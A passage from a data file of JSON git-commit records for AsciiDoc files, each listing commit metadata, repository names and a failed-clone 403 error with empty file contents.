acchen97\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,obourgain\/elasticsearch,brandonkearby\/elasticsearch,infusionsoft\/elasticsearch,kalburgimanjunath\/elasticsearch,strapdata\/elassandra,dpursehouse\/elasticsearch,fred84\/elasticsearch,knight1128\/elasticsearch,markllama\/elasticsearch,pablocastro\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,diendt\/elasticsearch,sarwarbhuiyan\/elasticsearch,IanvsPoplicola\/elasticsearch,wimvds\/elasticsearch,pranavraman\/elasticsearch,tebriel\/elasticsearch,lchennup\/elasticsearch,tkssharma\/elasticsearch,lzo\/elasticsearch-1,henakamaMSFT\/elasticsearch,loconsolutions\/elasticsearch,mmaracic\/elasticsearch,lks21c\/elasticsearch,iacdingping\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,hydro2k\/elasticsearch,kevinkluge\/elasticsearch,masaruh\/elasticsearch,franklanganke\/elasticsearch,mikemccand\/elasticsearch,MjAbuz\/elasticsearch,pablocastro\/elasticsearch,areek\/elasticsearch,xingguang2013\/elasticsearch,elasticdog\/elasticsearch,vietlq\/elasticsearch,davidvgalbraith\/elasticsearch,elasticdog\/elasticsearch,tsohil\/elasticsearch,coding0011\/elasticsearch,wittyameta\/elasticsearch,jimhooker2002\/elasticsearch,acchen97\/elasticsearch,sc0ttkclark\/elasticsearch,kingaj\/elasticsearch,jsgao0\/elasticsearch,mbrukman\/elasticsearch,ckclark\/elasticsearch,clintongormley\/elasticsearch,nellicus\/elasticsearch,queirozfcom\/elasticsearch,szroland\/elasticsearch,vietlq\/elasticsearch,StefanGor\/elasticsearch,MichaelLiZhou\/elasticsearch,javachengwc\/elasticsearch,girirajsharma\/elasticsearch,LewayneNaidoo\/elasticsearch,pranavraman\/elasticsearch,i-am-Nathan\/elasticsearch,Uiho\/elasticsearch,tahaemin\/elasticsearch,mapr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,aglne\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,cwurm\/elasticsearch,LeoYao\/elasticsearch,KimTaehee\/elasticsearch,linglaiyao1314\/elasticsearch,jeteve\/elasticsearch,wbowling\/elasticsearch,AndreKR\/elasticsearch,LeoYao\/elasticsearch,snikch\/elasticsearch,cwurm\/elasticsearch,Widen\/elasticsearch,fred84\/elasticsearch,AndreKR\/elasticsearch,zhiqinghuang\/elasticsearch,AndreKR\/elasticsearch,huanzhong\/elasticsearch,ydsakyclguozi\/elasticsearch,jango2015\/elasticsearch,jpountz\/elasticsearch,tsohil\/elasticsearch,trangvh\/elasticsearch,rajanm\/elasticsearch,sc0ttkclark\/elasticsearch,iamjakob\/elasticsearch,JSCooke\/elasticsearch,glefloch\/elasticsearch,himanshuag\/elasticsearch,jimczi\/elasticsearch,andrestc\/elasticsearch,EasonYi\/elasticsearch,ivansun1010\/elasticsearch,fooljohnny\/elasticsearch,Stacey-Gammon\/elasticsearch,likaiwalkman\/elasticsearch,acchen97\/elasticsearch,F0lha\/elasticsearch,JackyMai\/elasticsearch,martinstuga\/elasticsearch,jbertouch\/elasticsearch,EasonYi\/elasticsearch,achow\/elasticsearch,slavau\/elasticsearch,wuranbo\/elasticsearch,yynil\/elasticsearch,yynil\/elasticsearch,cnfire\/elasticsearch-1,gfyoung\/elasticsearch,robin13\/elasticsearch,tebriel\/elasticsearch,pritishppai\/elasticsearch,markllama\/elasticsearch,dongjoon-hyun\/elasticsearch,mjhennig\/elasticsearch,sneivandt\/elasticsearch,hafkensite\/elasticsearch,martinstuga\/elasticsearch,tsohil\/elasticsearch,fernandozhu\/elasticsearch,winstonewert\/elasticsearch,rajanm\/elasticsearch,camilojd\/elasticsearch,vroyer\/elassandra,geidies\/elasticsearch,C-Bish\/elasticsearch,Uiho\/elasticsearch,Stacey-Gammon\/elasticsearch,camilojd\/elasticsearch,Helen-Zhao\/elasticsearch,ckclark\/elasticsearch,ESamir\/elasticsearch,wimvds\/elasticsearch,brandonkearby\/elasticsearch,Maine
C\/elasticsearch,kevinkluge\/elasticsearch,btiernay\/elasticsearch,pritishppai\/elasticsearch,Widen\/elasticsearch,Brijeshrpatel9\/elasticsearch,sc0ttkclark\/elasticsearch,socialrank\/elasticsearch,iantruslove\/elasticsearch,MichaelLiZhou\/elasticsearch,huypx1292\/elasticsearch,kalimatas\/elasticsearch,himanshuag\/elasticsearch,Collaborne\/elasticsearch,caengcjd\/elasticsearch,rento19962\/elasticsearch,weipinghe\/elasticsearch,kubum\/elasticsearch,caengcjd\/elasticsearch,kunallimaye\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,tahaemin\/elasticsearch,dylan8902\/elasticsearch,kcompher\/elasticsearch,mjhennig\/elasticsearch,yynil\/elasticsearch,lydonchandra\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,tkssharma\/elasticsearch,ydsakyclguozi\/elasticsearch,mcku\/elasticsearch,fekaputra\/elasticsearch,mute\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,SergVro\/elasticsearch,mjhennig\/elasticsearch,caengcjd\/elasticsearch,Collaborne\/elasticsearch,karthikjaps\/elasticsearch,xuzha\/elasticsearch,djschny\/elasticsearch,mrorii\/elasticsearch,mm0\/elasticsearch,vietlq\/elasticsearch,pritishppai\/elasticsearch,coding0011\/elasticsearch,NBSW\/elasticsearch,clintongormley\/elasticsearch,Kakakakakku\/elasticsearch,wimvds\/elasticsearch,StefanGor\/elasticsearch,alexshadow007\/elasticsearch,mm0\/elasticsearch,liweinan0423\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,btiernay\/elasticsearch,Kakakakakku\/elasticsearch,18098924759\/elasticsearch,HarishAtGitHub\/elasticsearch,Uiho\/elasticsearch,rento19962\/elasticsearch,fforbeck\/elasticsearch,lmtwga\/elasticsearch,drewr\/elasticsearch,bestwpw\/elasticsearch,masterweb121\/elasticsearch,queirozfcom\/elasticsearch,nrkkalyan\/elasticsearch,kimimj\/elasticsearch,tebriel\/elasticsearch,dongjoon-hyun\/elasticsearch,coding0011\/elasticsearch,springning\/elasticsearch,18098924759\/elasticsearch,ckclark\/elasticsearch,beiske\/elasticsearch,wittyameta\/elasticsearch,caengcjd\/elasticsearch,hirdesh2008\/elasticsearch,LeoYao\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mgalushka\/elasticsearch,clintongormley\/elasticsearch,kimimj\/elasticsearch,wimvds\/elasticsearch,Widen\/elasticsearch,jeteve\/elasticsearch,gmarz\/elasticsearch,C-Bish\/elasticsearch,scottsom\/elasticsearch,ckclark\/elasticsearch,obourgain\/elasticsearch,rhoml\/elasticsearch,weipinghe\/elasticsearch,mgalushka\/elasticsearch,sreeramjayan\/elasticsearch,myelin\/elasticsearch,mcku\/elasticsearch,andrestc\/elasticsearch,markllama\/elasticsearch,nomoa\/elasticsearch,hanswang\/elasticsearch,iamjakob\/elasticsearch,mute\/elasticsearch,pritishppai\/elasticsearch,Stacey-Gammon\/elasticsearch,NBSW\/elasticsearch,masterweb121\/elasticsearch,szroland\/elasticsearch,MjAbuz\/elasticsearch,abibell\/elasticsearch,ImpressTV\/elasticsearch,StefanGor\/elasticsearch,franklanganke\/elasticsearch,huypx1292\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,naveenhooda2000\/elasticsearch,dpursehouse\/elasticsearch,weipinghe\/elasticsearch,kcompher\/elasticsearch,brandonkearby\/elasticsearch,HarishAtGitHub\/elasticsearch,JervyShi\/elasticsearch,spiegela\/elasticsearch,ESamir\/elasticsearch,lightslife\/elasticsearch,btiernay\/elasticsearch,cnfire\/elasticsearch-1,infusionsoft\/elasticsearch,smflorentino\/elasticsearch,schonfeld\/elasticsearch,palecur\/elasticsearch,huypx1292\/elasticsearch,kevinkluge\/elasticsearch,overcome\/elasticsearch,tahaemin\/elasticsearch,slavau\/elasticsearch,sdauletau\/elasticsearch,Siddartha07\/elasticsearch,btiernay\/elastics
earch,qwerty4030\/elasticsearch,koxa29\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,MichaelLiZhou\/elasticsearch,mbrukman\/elasticsearch","old_file":"docs\/java-api\/docs\/bulk.asciidoc","new_file":"docs\/java-api\/docs\/bulk.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f8797474ca1155431423916e225305a27449e85","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed1bb2c5beec8fd9f099cf6f3fa87ad5dbad8016","subject":"Update README","message":"Update README\n","repos":"pjanouch\/json-rpc-shell,pjanouch\/json-rpc-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/json-rpc-shell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"3ac1da111b6949c4a174da5cff4b39e9139f971a","subject":"Add readme","message":"Add readme\n","repos":"mdenchev\/mui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdenchev\/mui.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ec07d75ade52bc20ac11f3abb0117c306beb74","subject":"README (work in progress)","message":"README (work in progress)","repos":"ajneu\/fractionizer,ajneu\/fractionizer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/fractionizer.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"986487b7ac41f382dfa402f671914798c06eaea1","subject":"Add the README.","message":"Add the README.\n","repos":"joshuawilson\/presentations,joshuawilson\/presentations,joshuawilson\/presentations,joshuawilson\/presentations","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuawilson\/presentations.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a09633bd0323a98f087bf6c6f1055ce7faeabe5","subject":"Add badge for code scan","message":"Add badge for code scan","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"98fd21d5eff93d3ec52d328cb6f9d255523e6e9d","subject":"y2b create post SMS Audio STREET by 50 - On-Ear Wired Headphones Unboxing \\u0026 Overview","message":"y2b create post SMS Audio STREET by 50 - On-Ear Wired Headphones Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-23-SMS-Audio-STREET-by-50--OnEar-Wired-Headphones-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-03-23-SMS-Audio-STREET-by-50--OnEar-Wired-Headphones-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d47532e9626ea45b9f1138882ccaccd16bc92b3","subject":"added readme","message":"added readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"netty\/basic\/readme.adoc","new_file":"netty\/basic\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c11df4b4200902ba2f8e03c831a3536fb8afdc3","subject":"Wording Interf","message":"Wording Interf\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f81518d81a9018a8a62bff75c1a7ac5a53a17cb5","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d355012e62435dfb73c8ae09993ca66288b47659","subject":"Update 2017-03-27-Deployment-of-web-applications-through-Intellij-Idea.adoc","message":"Update 2017-03-27-Deployment-of-web-applications-through-Intellij-Idea.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2017-03-27-Deployment-of-web-applications-through-Intellij-Idea.adoc","new_file":"_posts\/2017-03-27-Deployment-of-web-applications-through-Intellij-Idea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"647326862c2be94f830c997706e9090391560548","subject":"Added a HACKING document to describe the basics of contributing to development","message":"Added a HACKING document to describe the basics of contributing to 
development\n","repos":"ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,mojavelinux\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin","old_file":"HACKING.adoc","new_file":"HACKING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mojavelinux\/asciidoctor-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd59574687ba4eea1bc53ab72ca9509e389ec7cd","subject":"Update 2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","message":"Update 2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","new_file":"_posts\/2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a459cf6ab0db6b049bc8369b55f5549e2796756","subject":"CL note: macro -> closure","message":"CL note: macro -> closure\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8f848b83749b38cf2e216776155e36177f3e321a","subject":"Added README","message":"Added README\n","repos":"Maarc\/windup,jsight\/windup,windup\/windup,d-s\/windup,mbriskar\/windup,OndraZizka\/windup,mbriskar\/windup,Ladicek\/windup,johnsteele\/windup,lincolnthree\/windup,OndraZizka\/windup,sgilda\/windup,mareknovotny\/windup,windup\/windup-legacy,mbriskar\/windup,johnsteele\/windup,lincolnthree\/windup,johnsteele\/windup,bradsdavis\/windup,Maarc\/windup,windup\/windup,d-s\/windup,bradsdavis\/windup,windup\/windup-sample-apps,Ladicek\/windup,windup\/windup-legacy,sgilda\/windup,mbriskar\/windup,mareknovotny\/windup,bradsdavis\/windup,d-s\/windup,OndraZizka\/windup,jsight\/windup,mareknovotny\/windup,lincolnthree\/windup,jsight\/windup,windup\/windup,sgilda\/windup,lincolnthree\/windup,OndraZizka\/windup,Maarc\/windup,windup\/windup,sgilda\/windup,windup\/windup-legacy,Ladicek\/windup,Ladicek\/windup,johnsteele\/windup,jsight\/windup,mareknovotny\/windup,d-s\/windup,Maarc\/windup","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ladicek\/windup.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d57526e72e009f9d6b2fd2ca49c689e845a0fc1b","subject":"y2b create post World's Smallest Android Phone!","message":"y2b create post World's Smallest Android 
Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-17-Worlds-Smallest-Android-Phone.adoc","new_file":"_posts\/2016-04-17-Worlds-Smallest-Android-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1c9cde5e77ce45895b494a0bc193a8f536cd152","subject":"Configuration for the tensorics repo.","message":"Configuration for the tensorics repo.\n\nIt should start working as soon as we add travis and Coveralls.\nConflicts:\n\tREADME.asciidoc\n\n\ngit-svn-id: 44110302500ff4d6168e3867631ad1bb4eb9722b@11178 6cd15df7-5b2d-4548-a7df-5dcce267a22b\n","repos":"tensorics\/tensorics-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65ce12938af67b4dc96d6c779b26719c6778d55d","subject":"job: #11455 introducing analysis of Deployment Export","message":"job: #11455 introducing analysis of Deployment Export\n","repos":"cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,lwriemen\/mc,xtuml\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,cortlandstarrett\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc","old_file":"doc\/notes\/11444_wasl\/11455_export_depl_ant.adoc","new_file":"doc\/notes\/11444_wasl\/11455_export_depl_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf512861eb3c58e82881467d3ee367c4fef5b99b","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9f836d2867297199b13822e117e7490f554f542","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20-together.adoc","message":"Update 
2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b6c7e7ed216230c19c4683d5d0b8cf3fc15b43f","subject":"Deleted 2017-02-25adocadoc-part-1.adoc","message":"Deleted 2017-02-25adocadoc-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adocadoc-part-1.adoc","new_file":"2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e33b635e3de09c9fb0ed3768ee2f169925ba46eb","subject":"Update 2016-07-15-who-am-i.adoc","message":"Update 2016-07-15-who-am-i.adoc","repos":"dmacstack\/glob,dmacstack\/glob,dmacstack\/glob,dmacstack\/glob","old_file":"_posts\/2016-07-15-who-am-i.adoc","new_file":"_posts\/2016-07-15-who-am-i.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dmacstack\/glob.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cfd4c8a40ac1391b1859f84e286824d12b8315e","subject":"Update 2017-03-06-A-G-Poem.adoc","message":"Update 2017-03-06-A-G-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-06-A-G-Poem.adoc","new_file":"_posts\/2017-03-06-A-G-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12162aafc22ac1bb82f72fecc42c785432740f84","subject":"Update 2017-04-08-Next-Poem.adoc","message":"Update 2017-04-08-Next-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-08-Next-Poem.adoc","new_file":"_posts\/2017-04-08-Next-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddb88752fda27483ec475a62e29a9a690a334cf1","subject":"Update 2017-08-08-adjmotion.adoc","message":"Update 2017-08-08-adjmotion.adoc","repos":"adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press","old_file":"_posts\/2017-08-08-adjmotion.adoc","new_file":"_posts\/2017-08-08-adjmotion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjiebpratama\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"2507637cf8a4d49191242d69a546799fca02ad85","subject":"Update 2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","message":"Update 2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92c1492946077585eca34f23241410e6d3bd988b","subject":"First shot at some WF-Swarm web-presence.","message":"First shot at some WF-Swarm web-presence.\n","repos":"rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org","old_file":"swarm\/index.adoc","new_file":"swarm\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8e94b185363e4c8433577bd5d617a2999f0f5ab4","subject":"Update 2017-08-29-proxmox-installer-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","message":"Update 2017-08-29-proxmox-installer-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2017-08-29-proxmox-installer-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","new_file":"_posts\/2017-08-29-proxmox-installer-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"775a5a11ea1bca09f5f7dc12b3feba6fe2b8ae36","subject":"Update 2016-04-09-Hello-Ascii-Doc.adoc","message":"Update 2016-04-09-Hello-Ascii-Doc.adoc","repos":"buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io","old_file":"_posts\/2016-04-09-Hello-Ascii-Doc.adoc","new_file":"_posts\/2016-04-09-Hello-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buliaoyin\/buliaoyin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"722e30a5be8fb4cc171441d0110462912d39c3f3","subject":"Update 2016-04-16-Nullifying-Null.adoc","message":"Update 
2016-04-16-Nullifying-Null.adoc","repos":"reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io","old_file":"_posts\/2016-04-16-Nullifying-Null.adoc","new_file":"_posts\/2016-04-16-Nullifying-Null.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reggert\/reggert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68cc6a64fb1229a50546610e77468bd5107e4778","subject":"Update 2017-08-07-Hello-Hub-Press.adoc","message":"Update 2017-08-07-Hello-Hub-Press.adoc","repos":"adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press","old_file":"_posts\/2017-08-07-Hello-Hub-Press.adoc","new_file":"_posts\/2017-08-07-Hello-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjiebpratama\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"694387ef8a2a9f6182df3fa8144a22643d37fe7a","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 